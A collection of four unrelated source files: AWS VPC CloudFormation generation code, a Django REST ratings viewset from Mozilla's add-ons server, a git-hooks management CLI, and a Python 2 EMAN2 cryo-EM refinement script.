ec2.RouteTable(public_rt_name, VpcId=self.vpc,
Tags=Tags(Name=Join('', [Ref('AWS::StackName'), '-', public_rt_name]))))
# Add Public and Private Subnets and Private Route Table
for az in self.availability_zones:
private_rt_name = get_cf_friendly_name(az) + 'PriRouteTable'
private_route_table = self.template.add_resource(
ec2.RouteTable(private_rt_name, VpcId=self.vpc,
Tags=Tags(Name=Join('', [Ref('AWS::StackName'), '-', private_rt_name]))))
self.private_route_tables[az] = private_route_table
self.private_subnets.append(Subnet(template=self.template,
route_table=private_route_table,
az=az,
vpc=self.vpc,
is_public=False,
cidr=self.generate_subnet_cidr(is_public=False)).trop_subnet)
public_subnet = Subnet(template=self.template,
route_table=self.public_route_table,
az=az,
vpc=self.vpc,
is_public=True,
cidr=self.generate_subnet_cidr(is_public=True)).trop_subnet
self.public_subnets.append(public_subnet)
self.public_subnet_mapping[az] = Ref(public_subnet)
self.sns_topic = SNS(self.template)
for email in self.owner_emails:
self.sns_topic.add_subscription(email, 'email')
jump_config = SingleInstanceConfig(
keypair=self.keypair,
si_image_id=self.jump_image_id,
si_instance_type=self.jump_instance_type,
subnet=self.public_subnet_mapping[availability_zones[0]],
vpc=self.vpc,
public_hosted_zone_name=self.public_hosted_zone_name,
instance_dependencies=self.gateway_attachment.title,
iam_instance_profile_arn=self.iam_instance_profile_arn,
is_nat=False,
sns_topic=self.sns_topic,
availability_zone=availability_zones[0],
ec2_scheduled_shutdown=self.ec2_scheduled_shutdown,
owner=self.owner
)
# Add Jumpbox and NAT and associated security group ingress and egress rules
self.jump = SingleInstance(
title='Jump',
template=self.template,
single_instance_config=jump_config
)
[self.jump.add_ingress(sender=home_cidr, port='22') for home_cidr in self.home_cidrs]
self.jump.add_egress(receiver={'name': 'PublicIp', 'cidr': '0.0.0.0/0'}, port='-1')
if self.nat_highly_available:
for public_subnet in self.public_subnets:
az = public_subnet.AvailabilityZone
ip_address = self.template.add_resource(
EIP(get_cf_friendly_name(az) + 'NatGwEip',
DependsOn=self.gateway_attachment.title,
Domain='vpc'
))
nat_gateway = self.template.add_resource(NatGateway(get_cf_friendly_name(az) + 'NatGw',
AllocationId=GetAtt(ip_address, 'AllocationId'),
SubnetId=Ref(public_subnet),
DependsOn=self.gateway_attachment.title
))
self.nat_gateways.append(nat_gateway)
self.template.add_resource(ec2.Route(get_cf_friendly_name(az) + 'PriRoute',
NatGatewayId=Ref(nat_gateway),
RouteTableId=Ref(self.private_route_tables[az]),
DestinationCidrBlock=self.public_cidr['cidr'],
DependsOn=self.gateway_attachment.title))
else:
nat_config = SingleInstanceConfig(
keypair=self.keypair,
si_image_id=self.nat_image_id,
si_instance_type=self.nat_instance_type,
subnet=self.public_subnet_mapping[availability_zones[0]],
vpc=self.vpc,
is_nat=True,
instance_dependencies=self.gateway_attachment.title,
iam_instance_profile_arn=self.iam_instance_profile_arn,
public_hosted_zone_name=None,
sns_topic=self.sns_topic,
availability_zone=availability_zones[0],
ec2_scheduled_shutdown=self.ec2_scheduled_shutdown,
owner=self.owner
)
self.nat = SingleInstance(
title='Nat',
template=self.template,
single_instance_config=nat_config
)
self.nat.add_egress(receiver=self.public_cidr, port='-1')
self.nat.add_ingress(sender=self.vpc_cidr, port='-1')
for az in self.availability_zones:
self.template.add_resource(ec2.Route(get_cf_friendly_name(az) + 'PriRoute',
InstanceId=Ref(self.nat.single),
RouteTableId=Ref(self.private_route_tables[az]),
DestinationCidrBlock=self.public_cidr['cidr'],
DependsOn=self.gateway_attachment.title))
# Add Public Route
self.public_route = self.template.add_resource(ec2.Route('PubRoute',
GatewayId=Ref(self.internet_gateway),
RouteTableId=Ref(self.public_route_table),
DestinationCidrBlock=self.public_cidr['cidr'],
DependsOn=self.gateway_attachment.title))
def generate_subnet_cidr(self, is_public):
"""
Function to help create Class C subnet CIDRs from Class A VPC CIDRs
:param is_public: boolean for public or private subnet determined by route table
:return: Subnet CIDR based on Public or Private and previous subnets created e.g. 10.0.2.0/24 or 10.0.101.0/24
"""
# 3rd Octet: Obtain length of pub or pri subnet list
octet_3 = len(self.public_subnets) if is_public else len(self.private_subnets) + 100
cidr_split = self.vpc_cidr['cidr'].split('.') # separate VPC CIDR for renaming
cidr_split[2] = str(octet_3) # set 3rd octet based on public or private
cidr_last = cidr_split[3].split('/') # split last group to change subnet mask
cidr_last[1] = '24' # set subnet mask
cidr_split[3] = '/'.join(cidr_last) # join last group for subnet mask
return '.'.join(cidr_split)
|
|
from django.db.models import Prefetch, Q
from django.utils.encoding import force_text
from rest_framework import serializers
from rest_framework.decorators import action
from rest_framework.exceptions import (
NotAuthenticated, ParseError, PermissionDenied)
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from rest_framework.status import HTTP_202_ACCEPTED
from rest_framework.viewsets import ModelViewSet
from olympia import amo
from olympia.access import acl
from olympia.addons.views import AddonChildMixin
from olympia.api.pagination import OneOrZeroPageNumberPagination
from olympia.api.permissions import (
AllowAddonAuthor, AllowIfPublic, AllowNotOwner, AllowOwner,
AllowRelatedObjectPermissions, AnyOf, ByHttpMethod, GroupPermission)
from olympia.api.throttling import GranularUserRateThrottle
from olympia.api.utils import is_gate_active
from .models import GroupedRating, Rating, RatingFlag
from .permissions import CanDeleteRatingPermission
from .serializers import (
RatingFlagSerializer, RatingSerializer, RatingSerializerReply)
class RatingThrottle(GranularUserRateThrottle):
rate = '1/minute'
scope = 'user_rating'
def allow_request(self, request, view):
if request.method.lower() == 'post':
return super(RatingThrottle, self).allow_request(request, view)
else:
return True
class RatingReplyThrottle(RatingThrottle):
rate = '1/5second'
class RatingViewSet(AddonChildMixin, ModelViewSet):
serializer_class = RatingSerializer
permission_classes = [
ByHttpMethod({
'get': AllowAny,
'head': AllowAny,
'options': AllowAny, # Needed for CORS.
# Deletion requires a specific permission check.
'delete': CanDeleteRatingPermission,
# To post a rating you just need to be authenticated.
'post': IsAuthenticated,
# To edit a rating you need to be the author or be an admin.
'patch': AnyOf(AllowOwner, GroupPermission(
amo.permissions.ADDONS_EDIT)),
# Implementing PUT would be a little incoherent as we don't want to
# allow users to change `version` but require it at creation time.
# So only PATCH is allowed for editing.
}),
]
reply_permission_classes = [AnyOf(
GroupPermission(amo.permissions.ADDONS_EDIT),
AllowRelatedObjectPermissions('addon', [AllowAddonAuthor]),
)]
reply_serializer_class = RatingSerializerReply
flag_permission_classes = [AllowNotOwner]
throttle_classes = (RatingThrottle,)
def set_addon_object_from_rating(self, rating):
"""Set addon object on the instance from a rating object."""
# At this point it's likely we didn't have an addon in the request, so
# if we went through get_addon_object() before it's going to be set
# to None already. We delete the addon_object property cache and set
# addon_pk in kwargs to force get_addon_object() to reset
# self.addon_object.
del self.addon_object
self.kwargs['addon_pk'] = str(rating.addon.pk)
return self.get_addon_object()
def get_addon_object(self):
"""Return addon object associated with the request, or None if not
relevant.
Will also fire permission checks on the addon object when it's loaded.
"""
if hasattr(self, 'addon_object'):
return self.addon_object
if 'addon_pk' not in self.kwargs:
self.kwargs['addon_pk'] = (
self.request.data.get('addon') or
self.request.GET.get('addon'))
if not self.kwargs['addon_pk']:
# If we don't have an addon object, set it as None on the instance
# and return immediately, that's fine.
self.addon_object = None
return
else:
# AddonViewSet.get_lookup_field() expects a string.
self.kwargs['addon_pk'] = force_text(self.kwargs['addon_pk'])
# When loading the add-on, pass a specific permission class - the
# default from AddonViewSet is too restrictive, we are not modifying
# the add-on itself so we don't need all the permission checks it does.
return super(RatingViewSet, self).get_addon_object(
permission_classes=[AllowIfPublic])
def should_include_flags(self):
if not hasattr(self, '_should_include_flags'):
request = self.request
self._should_include_flags = (
'show_flags_for' in request.GET and
not is_gate_active(request, 'del-ratings-flags')
)
if self._should_include_flags:
# Check the parameter was sent correctly
try:
show_flags_for = (
serializers.IntegerField().to_internal_value(
request.GET['show_flags_for']))
if show_flags_for != request.user.pk:
raise serializers.ValidationError
except serializers.ValidationError:
raise ParseError(
'show_flags_for parameter value should be equal to '
'the user id of the authenticated user')
return self._should_include_flags
def check_permissions(self, request):
"""Perform permission checks.
The regular DRF permissions checks are made, but also, before that, if
an addon was requested, verify that it exists, is public and listed,
through AllowIfPublic permission, that get_addon_object() uses."""
self.get_addon_object()
# Proceed with the regular permission checks.
return super(RatingViewSet, self).check_permissions(request)
def get_serializer(self, *args, **kwargs):
if self.action in ('partial_update', 'update'):
instance = args[0]
if instance.reply_to is not None:
self.rating_object = instance.reply_to
self.serializer_class = self.reply_serializer_class
return super(RatingViewSet, self).get_serializer(*args, **kwargs)
def filter_queryset(self, qs):
if self.action == 'list':
addon_identifier = self.request.GET.get('addon')
user_identifier = self.request.GET.get('user')
version_identifier = self.request.GET.get('version')
score_filter = (
self.request.GET.get('score')
if is_gate_active(self.request, 'ratings-score-filter')
else None)
exclude_ratings = self.request.GET.get('exclude_ratings')
if addon_identifier:
qs = qs.filter(addon=self.get_addon_object())
if user_identifier:
try:
user_identifier = int(user_identifier)
except ValueError:
raise ParseError('user parameter should be an integer.')
qs = qs.filter(user=user_identifier)
if version_identifier:
try:
version_identifier = int(version_identifier)
except ValueError:
raise ParseError('version parameter should be an integer.')
qs = qs.filter(version=version_identifier)
elif addon_identifier:
# When filtering on addon but not on version, only return the
# latest rating posted by each user.
qs = qs.filter(is_latest=True)
if not addon_identifier and not user_identifier:
# Don't allow listing ratings without filtering by add-on or
# user.
raise ParseError('Need an addon or user parameter')
if user_identifier and addon_identifier and version_identifier:
# When user, addon and version identifiers are set, we are
# effectively only looking for one or zero objects. Fake
# pagination in that case, avoiding all count() calls and
# therefore related cache-machine invalidation issues. Needed
# because the frontend wants to call this before and after
# having posted a new rating, and needs accurate results.
self.pagination_class = OneOrZeroPageNumberPagination
if score_filter:
try:
scores = [int(score) for score in score_filter.split(',')]
except ValueError:
raise ParseError(
'score parameter should be an integer or a list of '
'integers (separated by a comma).')
qs = qs.filter(rating__in=scores)
if exclude_ratings:
try:
exclude_ratings = [
int(rating) for rating in exclude_ratings.split(',')
]
except ValueError:
raise ParseError('exclude_ratings parameter should be an '
'integer or a list of integers '
'(separated by a comma).')
qs = qs.exclude(pk__in=exclude_ratings)
return super(RatingViewSet, self).filter_queryset(qs)
def get_paginated_response(self, data):
request = self.request
extra_data = {}
if 'show_grouped_ratings' in request.GET:
try:
show_grouped_ratings = (
serializers.BooleanField().to_internal_value(
request.GET['show_grouped_ratings']))
except serializers.ValidationError:
raise ParseError(
'show_grouped_ratings parameter should be a boolean')
if show_grouped_ratings and self.get_addon_object():
extra_data['grouped_ratings'] = dict(GroupedRating.get(
self.addon_object.id))
if ('show_permissions_for' in request.GET and
is_gate_active(self.request, 'ratings-can_reply')):
if 'addon' not in request.GET:
raise ParseError(
'show_permissions_for parameter is only valid if the '
'addon parameter is also present')
try:
show_permissions_for = (
serializers.IntegerField().to_internal_value(
request.GET['show_permissions_for']))
if show_permissions_for != request.user.pk:
raise serializers.ValidationError
except serializers.ValidationError:
raise ParseError(
'show_permissions_for parameter value should be equal to '
'the user id of the authenticated user')
extra_data['can_reply'] = (
self.check_can_reply_permission_for_ratings_list())
# Call this here so the validation checks on the `show_flags_for` are
# carried out even when there are no results to serialize.
self.should_include_flags()
response = super(RatingViewSet, self).get_paginated_response(data)
if extra_data:
response.data.update(extra_data)
return response
def check_can_reply_permission_for_ratings_list(self):
"""Check whether or not the current request contains an user that can
reply to ratings we're about to return.
Used to populate the `can_reply` property in ratings list, when an
addon is passed."""
# Clone the current viewset, but change permission_classes.
viewset = self.__class__(**self.__dict__)
viewset.permission_classes = self.reply_permission_classes
# Create a fake rating with the addon object attached, to be passed to
# check_object_permissions().
dummy_rating = Rating(addon=self.get_addon_object())
try:
viewset.check_permissions(self.request)
viewset.check_object_permissions(self.request, dummy_rating)
return True
except (PermissionDenied, NotAuthenticated):
return False
def get_queryset(self):
requested = self.request.GET.get('filter', '').split(',')
has_addons_edit = acl.action_allowed(self.request,
amo.permissions.ADDONS_EDIT)
# Add this as a property of the view, because we need to pass down the
# information to the serializer to show/hide delete replies.
if not hasattr(self, 'should_access_deleted_ratings'):
self.should_access_deleted_ratings = (
('with_deleted' in requested or self.action != 'list') and
self.request.user.is_authenticated and
has_addons_edit)
should_access_only_top_level_ratings = (
self.action == 'list' and self.get_addon_object())
if self.should_access_deleted_ratings:
# For admins or add-on authors replying. When listing, we include
# deleted ratings but still filter out out replies, because they'll
# be in the serializer anyway. For other actions, we simply remove
# any filtering, allowing them to access any rating out of the box
# with no extra parameter needed.
if self.action == 'list':
queryset = Rating.unfiltered.filter(reply_to__isnull=True)
else:
queryset = Rating.unfiltered.all()
elif should_access_only_top_level_ratings:
# When listing add-on ratings, exclude replies, they'll be
# included during serialization as children of the relevant
# ratings instead.
queryset = Rating.without_replies.all()
else:
queryset = Rating.objects.all()
# Filter out empty ratings if specified.
# Should the users own empty ratings be filtered back in?
if 'with_yours' in requested and self.request.user.is_authenticated:
user_filter = Q(user=self.request.user.pk)
else:
user_filter = Q()
# Apply the filter(s)
if 'without_empty_body' in requested:
queryset = queryset.filter(~Q(body=None) | user_filter)
# The serializer needs reply, version and user. We don't need much
# for version and user, so we can make joins with select_related(),
# but for replies additional queries will be made for translations
# anyway so we're better off using prefetch_related() to make a
# separate query to fetch them all.
queryset = queryset.select_related('version', 'user')
replies_qs = Rating.unfiltered.select_related('user')
return queryset.prefetch_related(
Prefetch('reply', queryset=replies_qs))
@action(
detail=True, methods=['post'],
permission_classes=reply_permission_classes,
serializer_class=reply_serializer_class,
throttle_classes=[RatingReplyThrottle])
def reply(self, *args, **kwargs):
# A reply is just like a regular post, except that we set the reply
# FK to the current rating object and only allow add-on authors/admins.
# Call get_object() to trigger 404 if it does not exist.
self.rating_object = self.get_object()
self.set_addon_object_from_rating(self.rating_object)
if Rating.unfiltered.filter(reply_to=self.rating_object).exists():
# A reply already exists, just edit it.
# We set should_access_deleted_ratings so that it works even if
# the reply has been deleted.
self.kwargs['pk'] = kwargs['pk'] = self.rating_object.reply.pk
self.should_access_deleted_ratings = True
return self.partial_update(*args, **kwargs)
return self.create(*args, **kwargs)
@action(
detail=True, methods=['post'],
permission_classes=flag_permission_classes,
throttle_classes=[])
def flag(self, request, *args, **kwargs):
# We load the add-on object from the rating to trigger permission
# checks.
self.rating_object = self.get_object()
self.set_addon_object_from_rating(self.rating_object)
try:
flag_instance = RatingFlag.objects.get(
rating=self.rating_object, user=self.request.user)
except RatingFlag.DoesNotExist:
flag_instance = None
if flag_instance is None:
serializer = RatingFlagSerializer(
data=request.data, context=self.get_serializer_context())
else:
serializer = RatingFlagSerializer(
flag_instance, data=request.data, partial=False,
context=self.get_serializer_context())
serializer.is_valid(raise_exception=True)
serializer.save()
headers = self.get_success_headers(serializer.data)
return Response(
serializer.data, status=HTTP_202_ACCEPTED, headers=headers)
def perform_destroy(self, instance):
instance.delete(user_responsible=self.request.user)
|
|
from __future__ import print_function
import hashlib
import logging
import stat
from argparse import ArgumentParser
import posixpath
import requests
import os
import shutil
from . import utils, repo
from .compat import ConfigParser, urlsplit, urljoin, FileExistsException
logger = logging.getLogger(__name__)
def get_input(): # pragma: no cover (this is always mocked out)
return input()
class Base(object):
"""
The base command object
:var description: The brief description of the command
:var sub_commands: A dictionary mapping names to sub commands. Each value should be a class inheriting from Base.
"""
description = None
sub_commands = {}
def __init__(self, name=None):
"""
Creates the command
:param name: The name the command is registered to
"""
self.name = name
self._arg_parser = None
@property
def sub_parser_dest_name(self):
"""
The name of the argument the name of the sub command will be stored in
"""
if self.name:
return u'{0}__sub_command'.format(self.name)
return 'sub_command'
@property
def arg_parser(self):
if not self._arg_parser:
self._arg_parser = ArgumentParser(self.get_description())
self.add_args(self._arg_parser)
self.register_sub_commands(self._arg_parser)
return self._arg_parser
def parse_args(self):
"""
Parses the command line arguments
:return: The arguments taken from the command line
"""
return self.arg_parser.parse_args()
def add_args(self, parser):
"""
Adds arguments to the argument parser. This is used to modify which arguments are processed by the command.
For a full description of the argument parser see https://docs.python.org/3/library/argparse.html.
:param parser: The argument parser object
"""
pass
def register_sub_commands(self, parser):
"""
Add any sub commands to the argument parser.
:param parser: The argument parser object
"""
sub_commands = self.get_sub_commands()
if sub_commands:
sub_parsers = parser.add_subparsers(dest=self.sub_parser_dest_name)
for name, cls in sub_commands.items():
cmd = cls(name)
sub_parser = sub_parsers.add_parser(name, help=cmd.get_description(), description=cmd.get_description())
cmd.add_args(sub_parser)
cmd.register_sub_commands(sub_parser)
def get_sub_commands(self):
"""
Gets a dictionary mapping names to sub commands. Values should be classes inheriting from Base.
:return: The list of sub commands.
"""
return self.sub_commands
def get_description(self):
"""
Gets the description of the command
"""
return self.description
def action(self, args):
"""
Performs the action of the command.
This should be implemented by sub classes.
:param args: The arguments parsed from parse_args
:return: The status code of the action (0 on success)
"""
self.arg_parser.print_help()
return 1
def run(self):
"""
Runs the command passing in the parsed arguments.
:return: The status code of the action (0 on success)
"""
args = self.parse_args()
sub_command_name = getattr(args, self.sub_parser_dest_name, None)
if sub_command_name:
return self.get_sub_commands()[sub_command_name]().action(args)
return self.action(args)
class Init(Base):
description = 'Initialises the hooks repository'
def add_args(self, parser):
parser.add_argument('-y', '--overwrite', help='Silently overwrite existing hooks', action='store_true', dest='overwrite')
parser.add_argument('-n', '--no-overwrite', help='Silently avoid overwriting existing hooks', action='store_true', dest='no_overwrite')
def action(self, args):
if not repo.get().heads:
logger.error('The hook runner doesnt currently work for new repos. Perform an initial commit before initialising githooks (see: https://github.com/wildfish/git-hooks/issues/4)')
return 1
if args.overwrite and args.no_overwrite:
logger.error('Both the overwrite and no overwrite flags were set')
return 1
init_dir = os.path.join(repo.repo_root(), '.git', 'hooks')
for hook_name in utils.get_hook_names():
src = os.path.join(utils.get_hook_script_dir(), hook_name)
dst = os.path.join(init_dir, hook_name)
if not args.overwrite and os.path.exists(dst):
if args.no_overwrite:
continue
logger.info(u'A "{0}" already exists for this repository. Do you want to continue? y/[N]'.format(hook_name))
c = get_input()
if not(c.lower() == 'y' or c.lower() == 'yes'):
continue
shutil.copy(src, dst)
st = os.stat(dst)
os.chmod(dst, st.st_mode | stat.S_IEXEC)
try:
os.mkdir(dst + '.d')
except FileExistsException:
pass
return 0
class Install(Base):
description = 'Installs the selected hook'
def __init__(self, *args, **kwargs):
self._config = None
super(Install, self).__init__(*args, **kwargs)
def add_args(self, parser):
parser.add_argument('hook_type', nargs='?', help='The hook type to install. If no hook is given the config from "githooks.cfg" or "setup.cfg" is used', default=None, choices=utils.get_hook_names())
parser.add_argument('hooks', nargs='*', help='The names/urls for hooks to install')
parser.add_argument('-u', '--upgrade', help='Flag if hooks should be upgraded with the remote version', action='store_true', dest='upgrade')
parser.add_argument('-y', '--yes', help='Flag if all hooks should be installed without prompting', action='store_true', dest='yes')
def action(self, args):
if args.hook_type:
self._install_hooks(args.hook_type, args.hooks, args.upgrade, args.yes)
else:
for hook_type, hooks in self.config.items():
self._install_hooks(hook_type, hooks, args.upgrade, args.yes)
def _name_from_uri(self, uri):
path = urlsplit(uri).path
return posixpath.basename(path)
def _install_hooks(self, hook_name, hooks, upgrade, install_all=False):
type_repo = repo.hook_type_directory(hook_name)
for hook in hooks:
name = self._name_from_uri(hook)
uri = hook
# check if we need to skip based on the hook alread existing
if not upgrade and os.path.exists(os.path.join(type_repo, name)):
logger.info(u'"{0}" is already installed, use "--upgrade" to upgrade the hook to the newest version.'.format(name))
continue
response = requests.get(uri)
# print file content so that it can be checked before installing
if not install_all:
logger.info('## Installing {} from {}'.format(name, uri))
for line in response.content.decode().split('\n'):
logger.info(line)
if not input('Continue? [y/N]: ').lower() in ['y', 'yes']:
logger.info('Not installing {} from {}'.format(name, uri))
continue
# save the hook
logger.info('Installing {} from {}'.format(name, uri))
dst = os.path.join(type_repo, name)
with open(dst, 'wb') as f:
f.write(response.content)
st = os.stat(dst)
os.chmod(dst, st.st_mode | stat.S_IEXEC)
@property
def config(self):
if self._config is None: # pragma: no cover (dont need to cover the caching behaviour)
parser = ConfigParser()
if os.path.exists(os.path.join(repo.repo_root(), 'git-hooks.cfg')):
parser.read(os.path.join(repo.repo_root(), 'git-hooks.cfg'))
self._config = dict(
(k, v.split('\n')) for k, v in parser.items('install')
)
elif os.path.exists(os.path.join(repo.repo_root(), 'setup.cfg')):
parser.read(os.path.join(repo.repo_root(), 'setup.cfg'))
self._config = dict(
(k, v.split('\n')) for k, v in parser.items('git-hooks.install')
)
return self._config
class Uninstall(Base):
def add_args(self, parser):
parser.add_argument('hook_type', nargs='?', help='The hook type to uninstall.', choices=utils.get_hook_names())
parser.add_argument('hooks', nargs='*', help='The names for hooks to uninstall')
def action(self, args):
type_dir = repo.hook_type_directory(args.hook_type)
for hook in args.hooks:
hook_path = os.path.join(type_dir, hook)
if os.path.exists(hook_path):
os.remove(hook_path)
else:
logger.info('{} hook called "{}" could not be found. SKIPPING.'.format(args.hook_type, hook))
class Hooks(Base):
description = 'Manages your commit hooks for you!'
sub_commands = {
'init': Init,
'install': Install,
'uninstall': Uninstall,
}
|
|
#!/usr/bin/env python
import optparse
from sys import *
import os,sys,re
from optparse import OptionParser
import glob
import subprocess
from os import system
import linecache
import numpy as np
import matplotlib.pyplot as plt
import Image
import pylab
from matplotlib.ticker import MultipleLocator, FormatStrFormatter
import math
#=========================
def setupParserOptions():
parser = optparse.OptionParser()
parser.set_usage("%prog -u <untilted stack> -m <model> -p <parameter file>")
parser.add_option("-u",dest="untilted",type="string",metavar="FILE",
help="untilted stack (white particles in IMAGIC format)")
parser.add_option("-t",dest="tilted",type="string",metavar="FILE",
help="tilted stack (black particles in IMAGIC format)")
parser.add_option("-m",dest="model",type="string",metavar="FILE",
help="3D model(s) for alignment (Single SPIDER volume or multi-volume HDF file)")
parser.add_option("-p",dest="param",type="string", metavar="FILE",
help="Parameter file with refinement info (free_param.par)")
parser.add_option("-c",dest="ctf",type="string",metavar="FILE",
help="CTF-information file for tilted particles")
parser.add_option("-a",action="store_true",dest="appion",default=False,
help="Flag if CTF-info comes from APPION")
parser.add_option("-d", action="store_true",dest="debug",default=False,
help="debug")
options,args = parser.parse_args()
if len(args) > 0:
parser.error("Unknown commandline options: " +str(args))
if len(sys.argv) < 2:
parser.print_help()
sys.exit()
params={}
for i in parser.option_list:
if isinstance(i.dest,str):
params[i.dest] = getattr(options,i.dest)
return params
#=========================
def checkConflicts(params):
if not params['untilted']:
print "\nWarning: no untilted stack specified\n"
elif not os.path.exists(params['untilted']):
print "\nError: stack file '%s' does not exist\n" % params['untilted']
sys.exit()
if not params['tilted']:
print "\nWarning: no tilted stack specified\n"
elif not os.path.exists(params['tilted']):
print "\nError: stack file '%s' does not exist\n" % params['tilted']
sys.exit()
if not params['model']:
print "\nWarning: no model specified\n"
elif not os.path.exists(params['model']):
print "\nError: model file '%s' does not exist\n" % params['model']
sys.exit()
if not params['param']:
print "\nError: no free_param.par file specified"
sys.exit()
if not os.path.isfile(params['param']):
print "\nError: free_param.par file does not exist\n"
sys.exit()
if not os.path.isfile(params['ctf']):
print "\nNo CTF-information specified for tilted stack; using 2 um as default\n"
sys.exit()
if os.path.exists('refine_eman2'):
print "\nOutput folder already exists, remove refine_eman2 and start again\n"
sys.exit()
s = params['untilted']
prep = '%s_prep.img' %(s[:-4])
if os.path.exists(prep):
os.remove(prep)
os.remove('%s.hed' %(prep[:-4]))
if os.path.exists('start.hdf'):
os.remove('start.hdf')
#========================
def file_len(fname):
with open(fname) as f:
for i, l in enumerate(f):
pass
return i + 1
#========================
def getEMANPath():
### get the imagicroot directory
emanpath = subprocess.Popen("env | grep EMAN2DIR", shell=True, stdout=subprocess.PIPE).stdout.read().strip()
if emanpath:
emanpath = emanpath.replace("EMAN2DIR=","")
if os.path.exists(emanpath):
return emanpath
print "EMAN2 was not found, make sure eman2/2.05 is in your path"
sys.exit()
#===========================
def getMYAMI():
myamipath = subprocess.Popen("env | grep MYAMI", shell=True, stdout=subprocess.PIPE).stdout.read().strip()
if myamipath:
myamipath = myamipath.replace("MYAMI=","")
if os.path.exists(myamipath):
return myamipath
print "myami was not found, make sure myami is loaded"
sys.exit()
#========================
def getOPENMPIPath():
### get the openmpi directory
openpath = subprocess.Popen("env | grep MPIHOME", shell=True, stdout=subprocess.PIPE).stdout.read().strip()
test = openpath.find('imagic')
if test >= 0:
print "OPENMPI is not loaded, make sure it is in your path"
sys.exit()
if test is None:
if openpath:
openpath = openpath.replace("MPIHOME=","")
if os.path.exists(openpath):
return openpath
print "OPENMPI is not loaded, make sure it is in your path"
sys.exit()
#==========================
def getCCP4Path():
### get the openmpi directory
ccp4path = subprocess.Popen("env | grep CCP4_PATH", shell=True, stdout=subprocess.PIPE).stdout.read().strip()
if ccp4path:
ccp4path = ccp4path.replace("CCP4_PATH=","")
if os.path.exists(ccp4path):
return ccp4path
print "ccp4 is not loaded, make sure it is in your path"
sys.exit()
#========================
def grep(string,list):
expr = re.compile(string)
for text in list:
match = expr.search(text)
if match != None:
return match.string
#========================
def Eman2Freali(az,alt,phi):
t1 = Transform({"type":"eman","az":az,"alt":alt,"phi":phi,"mirror":False})
d = t1.get_params("eman")
psi = d["phi"]+90
if psi >360:
psi = psi-360
theta= d["alt"]
phi = d["az"]-90
return psi,theta,phi
#========================
def align(params,cwd):
debug = params['debug']
param = params['param']
untilt = params['untilted']
model = params['model']
#Get parameter info: angular step
p = open(param,'r')
a = 'angular'
angl = grep(a,p)
aL = angl.split()
ang = aL[2]
#Shift
s = 'shift'
p = open(param,'r')
shi = grep(s,p)
sh = shi.split()
sx = sh[2]
#Pixel size
p13 = open(param,'r')
pixel = 'pix'
pixe = grep(pixel,p13)
pi = pixe.split()
pix = pi[2]
#Radius
r = 'radius'
p = open(param,'r')
radiu = grep(r,p)
radi = radiu.split()
rad = radi[2]
p2 = open(param,'r')
#SNR
n = 'snr'
nr = grep(n,p2)
rn = nr.split()
snr = rn[2]
p3 = open(param,'r')
#ts
ts1 = 'ts'
ts2 = grep(ts1,p3)
ts3 = ts2.split()
ts = ts3[2]
#Box size
p4 = open(param,'r')
bxsz = 'boxSize'
bxs = grep(bxsz,p4)
bx = bxs.split()
box = bx[2]
p5 = open(param,'r')
#Number of particles
nmpts = 'num_part'
nmpt = grep(nmpts,p5)
nmp = nmpt.split()
tot = nmp[2]
#CS
p6 = open(param,'r')
cs1 = 'cs'
cs2 = grep(cs1,p6)
cs3 = cs2.split()
cs = cs3[2]
#Accelerating voltage
p7 = open(param,'r')
v1 = 'volt'
v2 = grep(v1,p7)
v3 = v2.split()
volt = v3[2]
#Free hand angular search
p8 = open(param,'r')
fs1 = 'freeHand_ang_search'
fs2 = grep(fs1,p8)
fs3 = fs2.split()
angSearch = fs3[2]
#Free hand Low resolution
p9 = open(param,'r')
mr1 = 'min_res'
mr2 = grep(mr1,p9)
mr3 = mr2.split()
min_res = mr3[2]
#Free hand Max resolution
p10 = open(param,'r')
mr4 = 'min_res'
mr5 = grep(mr4,p10)
mr6 = mr5.split()
max_res = mr6[2]
#Free hand first particle
p11 = open(param,'r')
fir1 = 'first'
fir2 = grep(fir1,p11)
fir3 = fir2.split()
first = fir3[2]
#Free hand last particle
p12 = open(param,'r')
ls1 = 'last'
ls2 = grep(ls1,p12)
ls3 = ls2.split()
last = ls3[2]
#Free hand Max resolution
p10 = open(param,'r')
mr4 = 'max_res'
mr5 = grep(mr4,p10)
mr6 = mr5.split()
max_res = mr6[2]
#Free hand increment
p13 = open(param,'r')
inc1 = 'incr'
inc2 = grep(inc1,p13)
inc3 = inc2.split()
incr = inc3[2]
#Free hand increment
p14 = open(param,'r')
m1 = 'mag'
m2 = grep(m1,p14)
m3 = m2.split()
mag = m3[2]
#Free hand increment
p15 = open(param,'r')
m1 = 'num_mod'
m2 = grep(m1,p15)
m3 = m2.split()
num_mod = int(m3[2])
p17 = open(param,'r')
pp1 = 'cutoff'
pp2 = grep(pp1,p17)
pp3 = pp2.split()
cutoff = pp3[2]
p18 = open(param,'r')
pp1 = 'calc'
pp2 = grep(pp1,p17)
pp3 = pp2.split()
calc = pp3[2]
#Prepare stack for EMAN2 refinement
print '\n'
print 'Converting stack into EMAN2 format'
print '\n'
#Filter particles to specified resolution limits
cmd = 'proc2d %s %s_prep.img apix=%s hp=%s lp=%s' %(untilt,untilt[:-4],pix,min_res,max_res)
subprocess.Popen(cmd,shell=True).wait()
cmd = '%s/up_head.py %s_prep.img %s' %(cwd,untilt[:-4],pix)
subprocess.Popen(cmd,shell=True).wait()
#Run refinement
print '\n'
print 'Running EMAN2 refinement'
print ' Angular step = %s' %(ang)
print ' Shift range = %s' %(sx)
print ' Shift step size (ts) = %s' %(ts)
print ' Pixel Size = %s' %(pix)
print ' Radius = %s' %(rad)
print ' SNR = %s' %(snr)
print ' CC_cut = %s' %(cutoff)
print '\n'
if num_mod == 1:
cmd = 'mpirun -np 8 %s/refine.py start.hdf %s refine_eman2 --ou=%s --rs=1 --xr=%s --ts=%s --delta=%s --snr=%s --center=0 --maxit=1 --ref_a=S --sym=c1 --cutoff=%s --MPI --full_output' %(cwd,model,rad,sx,ts,ang,snr,cutoff)
if debug is True:
print cmd
subprocess.Popen(cmd,shell=True).wait()
else:
cmd = 'mpirun -np 8 %s/refine.py start.hdf %s refine_eman2 --ou=%s --rs=1 --xr=%s --ts=%s --delta=%s --snr=%s --center=0 --maxit=1 --ref_a=S --sym=c1 --cutoff=%s --MPI --full_output --sort' %(cwd,model,rad,sx,ts,ang,snr,cutoff)
if debug is True:
print cmd
subprocess.Popen(cmd,shell=True).wait()
#Clean up:
cmd = 'rm logfile* start.hdf %s_prep.*' %(untilt[:-4])
subprocess.Popen(cmd,shell=True).wait()
def eman2_sort(paramout,tilt,ctf,num_mod,debug):
if debug is True:
print 'eman2_sort():'
